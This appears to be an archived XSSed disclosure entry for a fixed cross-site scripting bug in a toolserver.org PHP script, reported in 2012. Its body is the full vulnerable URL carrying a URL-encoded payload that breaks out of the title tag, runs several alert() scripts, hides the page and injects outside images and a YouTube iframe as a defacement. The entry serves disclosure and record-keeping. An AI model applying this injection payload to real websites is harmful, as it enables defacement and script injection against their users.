Fixed XSS vulnerability at toolserver.org

2012-02-19T00:00:00
ID XSSED:76560
Type xssed
Reporter Sony
Modified 2015-10-03T00:00:00

Description

Security researcher Sony, has submitted on 19/02/2012 a cross-site-scripting (XSS) vulnerability affecting toolserver.org, which at the time of submission ranked 338697 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 10/03/2015. It is currently fixed.

Vulnerable URL: http://toolserver.org/~vvv/yaec.php?user=test&wiki=abwiki_p%22%3E%3C/title%3E%3Cscript%3Ealert%28%22inSecurity.Ro%20Romania%20Present..%22%29%3C/script%3E%3Cscript%3Ealert%28%22Cross%20Site%20Scripting..%22%29%3C/script%3E%3Cscript%3Ealert%28%22on%20Wikimedia%20Toolserver%20by%20Sony%22%29%3C/script%3E%3Cscript%3Ealert%28%22Because%20we%20care,%20we%27re%20securtiy%20aware..%22%29%3C/script%3E%3Cscript%3Ealert%28%22p.s.%20Because%20we%20are%20from%20inSecurity.Ro%22%29%3C/script%3E%3Cstyle%3Ebody{visibility:hidden;}%20html{background-image:url%28%27http://www.lenagold.ru/fon/geom/shar/raz/razshar119.jpg%27%29;}%3C/style%3E%27%22%3E%3Cdiv%20style=%22position:%20absolute;center:%20420px;top:%2040px;%E2%80%8B%E2%80%8Bz-index:%2010;visibility:%20visible;%20color:%20White;%20font-size:%2040px;%22%3E%3Cimg%20src=%22http://img257.imageshack.us/img257/3733/77822687.png%22%20style=%22height:%20400px;%20width:%20550px;%22%20alt=%22By%20Sony%22%3E%3Ciframe%20width=%22560%22%20height=%22315%22%20src=%22http://www.youtube.com/embed/3P06kyFpIQU%22%20frameborder=%220%22%20allowfullscreen%3E%3C/iframe%3E